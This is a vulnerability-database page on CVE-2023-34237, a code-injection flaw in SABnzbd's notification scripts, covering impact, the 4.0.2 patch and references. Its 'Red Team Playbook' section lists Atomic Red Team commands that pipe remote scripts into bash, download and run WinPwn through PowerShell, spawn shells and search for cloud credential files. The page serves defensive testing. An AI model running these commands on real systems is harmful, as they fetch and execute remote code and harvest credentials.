CVE-2023-34237
Overview
This vulnerability is a code injection flaw (CWE-94) in the SABnzbd Usenet download tool. It arises from improper handling of user-supplied input in the Parameters setting of the Notification Script feature, allowing execution of arbitrary code within the SABnzbd process context. The affected component is the web interface's notification scripting functionality, which lacks adequate input validation and access control.
Vulnerability Description
SABnzbd is an open source automated Usenet download tool. A design flaw was discovered in SABnzbd that could allow remote code execution. Manipulating the Parameters setting in the Notification Script functionality allows code execution with the privileges of the SABnzbd process. Exploiting the vulnerabilities requires access to the web interface. Remote exploitation is possible if users[exposed their setup to the internet or other untrusted networks without setting a username/password. By default SABnzbd is only accessible from `localhost`, with no authentication required for the web interface. This issue has been patched in commits `e3a722` and `422b4f` which have been included in the 4.0.2 release. Users are advised to upgrade. Users unable to upgrade should ensure that a username and password have been set if their instance is web accessible.
Impact
An attacker with access to the SABnzbd web interface can execute arbitrary code with the same privileges as the SABnzbd process by exploiting this vulnerability. Remote exploitation is possible if the web interface is exposed to untrusted networks without authentication. This can lead to unauthorized system control, data compromise, or service disruption. The CVSS vector (AV:N/AC:H/PR:N/UI:N) indicates network attack complexity is high but requires no privileges or user interaction, emphasizing the importance of proper access controls.
Solution
Users should upgrade SABnzbd to version 4.0.2 or later, which includes patches in commits e3a722664819d1c7c8fab97144cc299b1c18b429 and 422b4fce7bfd56e95a315be0400cdfdc585df7cc as detailed in the official GitHub security advisory (https://github.com/sabnzbd/sabnzbd/security/advisories/GHSA-hhgh-xgh3-985r). For instances that cannot upgrade immediately, it is recommended to configure a username and password to restrict web interface access and avoid exposure to untrusted networks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the open-source automated Usenet download tool, SABnzbd, arises from a design flaw that permits remote code execution through manipulation of the Parameters setting within the Notification Script functionality. This flaw allows an attacker to execute arbitrary code with the same privileges as the SABnzbd process, which can lead to severe consequences depending on the environment in which the tool is deployed. The risk is particularly pronounced when the web interface is exposed to untrusted networks without proper authentication measures in place. By default, the application is configured to be accessible only from localhost, but if users inadvertently expose their setup to the internet without implementing a username and password, they create a significant attack surface.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with access to the web interface could manipulate the Notification Script parameters to inject malicious code. This could be achieved by crafting a specially designed request that exploits the design flaw, allowing the attacker to execute arbitrary commands on the server hosting SABnzbd. The requirement for access to the web interface means that the risk is heightened in scenarios where users have misconfigured their setups or neglected to secure their installations. In environments where SABnzbd is used for downloading content, an attacker could potentially gain control over the server, leading to data breaches, unauthorized access to sensitive information, or even the deployment of further malware.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on SABnzbd for automated downloads. The potential for remote code execution means that an attacker could not only compromise the integrity of the server but also leverage it as a foothold to pivot into other parts of the network. This could result in data loss, reputational damage, and significant financial implications due to downtime or recovery efforts. Businesses that fail to address this vulnerability may find themselves facing regulatory scrutiny, especially if sensitive data is exposed as a result of an exploit. The high CVSS score of 9.8 underscores the critical nature of this flaw and the urgency for organizations to take proactive measures.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched version of SABnzbd, specifically version 4.0.2 or later, which addresses the design flaw. For those unable to upgrade immediately, implementing strong authentication measures is essential. Users should configure their installations to require a username and password, particularly if the web interface is accessible from the internet. Additionally, organizations should conduct regular security assessments and penetration testing to identify and remediate potential vulnerabilities in their configurations. Monitoring logs for unusual access patterns or unauthorized requests can also help in detecting attempts to exploit this vulnerability.
In conclusion, the design flaw in SABnzbd presents a significant risk to users, particularly when the application is exposed to untrusted networks without proper security measures. The potential for remote code execution can lead to severe consequences, including unauthorized access and data breaches. Organizations must take immediate action to mitigate this risk by upgrading their installations and implementing robust authentication practices. By remaining vigilant and proactive in their security posture, users can protect their systems from the threats posed by this vulnerability.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sabnzbd | Sabnzbd | All |
cpe:2.3:a:sabnzbd:sabnzbd:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-34237 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/sabnzbd/sabnzbd/security/advisories/GHSA-hhgh-xgh3-985r |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/sabnzbd/sabnzbd/commit/422b4fce7bfd56e95a315be0400cdfdc585df7cc |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/sabnzbd/sabnzbd/commit/e3a722664819d1c7c8fab97144cc299b1c18b429 |
| sabnzbd.org |
GitHub CVE
x_refsource_MISC
|
https://sabnzbd.org/wiki/configuration/4.0/general |
| security.gentoo.org |
GitHub CVE
|
https://security.gentoo.org/glsa/202312-11 |